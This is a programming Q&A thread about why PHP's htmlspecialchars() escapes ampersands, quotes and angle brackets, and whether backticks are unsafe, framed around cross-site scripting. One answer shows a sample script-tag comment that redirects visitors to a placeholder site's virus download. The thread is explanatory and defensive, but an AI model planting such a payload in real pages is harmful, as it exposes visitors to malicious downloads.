Why these 5 (6?) characters are considered "unsafe" HTML characters?
Asked Answered
T

2

5

In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:

  • & (ampersand) is converted to &
  • " (double quote) is converted to "
  • ' (single quote) is converted to ' (only if the flag ENT_QUOTES is set)
  • < (less than) is converted to &lt;
  • > (greater than) is converted to &gt;

Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.

I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.

Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?


Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:

[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]

(source)

Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?


Finally, all this begs the question:

Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?

Treen answered 10/3, 2017 at 22:14 Comment(3)
This doesn't really answer your question, but does speak to #3 somewhat: Use a whitelist, not a blacklist when filtering for XSS vulnerabilities and the like. If you must allow HTML make it an extremely limited subset. Trying to filter out every possible bad entry is significantly harder than only allowing good entries.Ongun
@Ongun Thanks - I agree that simply escaping those 5(6?) characters is not the best way to prevent vulnerabilities. My question is more about why exactly those 5 characters were considered "more important" than others, and if there are others that should be put in the same bag, such as the backtick, perhaps.Treen
Now, anyone is willing to guess what is wrong with this question? I received a random downvote without explanation. I look forward to improve/fix the question, but without a comment I can't do that. Thanks.Treen
O
7

Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.

Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).

Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.

Now I sumbit a comment that looks like this.

<script type="text/javascript">
    window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>

And suddenly, everyone that visits your page is redirected to a virus download. The naive approach here is just to say, okay wellt hen let's filter out some of the important characters in that attack:

< and > will be replaced with &lt; and &gt; and now suddenly our script isn't a script. It's just some html-looking text.

A similar situation arsises with a comment like

Something is <<wrong>> here.

Supposing a user used <<...>> to emphasize for some reason. Their comment would render is

Something is <> here.

Obviously not desirable behavior.

A less malicious situation arises with &. & is used to denote HTML entities such as &amp; and &quot; and &lt; etc. So it's fairly easy for innocent-looking text to accidentally be an html entity and end up looking very different and very odd for a user.

Consider the comment

I really like #455 &#243; please let me know when they're available for purchase.

This would be rendered as

I really like #455 ó please let me know when they're available for purchase.

Obviously not intended behavior.

The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.

To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.

As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.

Ongun answered 11/3, 2017 at 21:25 Comment(3)
Thank you very much. How about the quotes? They are used to surround attributes, very well, I know that, but can you elaborate on that? Can they do harm/unintended things by themselves? (i.e. without the "help" of <>)Treen
Maybe. I'm extremely hesitant to say "no" outright. There's some more details to check out here owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet. The most obvious issue is if you take user input and slap it into an attribute, then obviously quotes can cause harm and escape the attribute itself. Eg allowing users to enter an image title and using it in the title attribute of the img tag, users could potentially change the img tag's src attribute just by breaking out of the quotes.Ongun
Context is everything. The htmlspecialchars() PHP function is simply a general function for escaping characters that can have special meaning in an HTML document (anywhere in that HTML document). It is not just for making output "safe". In fact, the PHP docs make no reference to "unsafe" characters. Quotes are perfectly OK when used in a body of text, but can break the output when used inside an HTML attribute (but only if the same quotes are used to delimit the attribute). Backticks could be problematic if you are parsing output for Markdown. Context matters.Patchouli
W
3

These chars Are unsafe because in html the <> define a tag.
The "", and '' are used to surround attributes.
the & is encoded because of the use in html entities.
no other chars Should be encoded but they can be ex:
the trade symbol can be made into &trade;
the US dollar sign can be made into &dollar; the euro can be &euro;
ANY emoji can be made out of a HTML entity (the name of the encoded things)
you can find a explanation/examples here

Wane answered 10/3, 2017 at 22:25 Comment(1)
Thanks, but this does not answer the question. You just stated where quotes and the ampersand are used. My question is about which symbols are dangerous for allowing injections (and more importantly, why).Treen

© 2022 - 2024 — McMap. All rights reserved.